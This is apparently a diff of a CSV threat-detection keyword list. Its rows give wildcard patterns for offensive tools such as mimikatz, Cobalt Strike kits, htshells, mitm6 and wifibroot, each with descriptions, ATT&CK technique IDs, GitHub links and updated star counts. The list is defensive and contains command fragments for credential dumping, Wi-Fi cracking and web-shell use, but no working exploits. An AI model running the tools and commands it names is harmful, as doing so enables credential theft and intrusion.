T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mitm6 --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*mitm6 -d *","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" "*mitm6.py*","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" "*mitmdump -*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mitmdump -s aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*MITMf.py*","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3480","1090","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" -"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32405","3799","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" +"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32422","3800","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" "*mitmsocks*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmsocks4j*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" -"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" -"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. 
malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" -"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. 
malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MockDirUACBypassDll*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*Mockingjay_BOF.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*Mockingjay_BOF-main*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - 
TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*mod_auth_remote.phish.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*mod_caucho.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bash.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bind.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.windows.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_mono.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_multi.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*mod_perl.embperl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.IPP.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.Mason.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" 
@@ -13668,8 +13826,8 @@
 "*mod_rivet.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
 "*mod_ruby.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
 "*mod_sendmail.rce.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
-"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z"
-"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z"
+"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
 "*modDetective*","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
 "*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
@@ -13680,127 +13838,129 @@ "*--mode proxy --action prototypes --path *prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*--mode proxy --dll *.dll*--external-resources*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*--mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
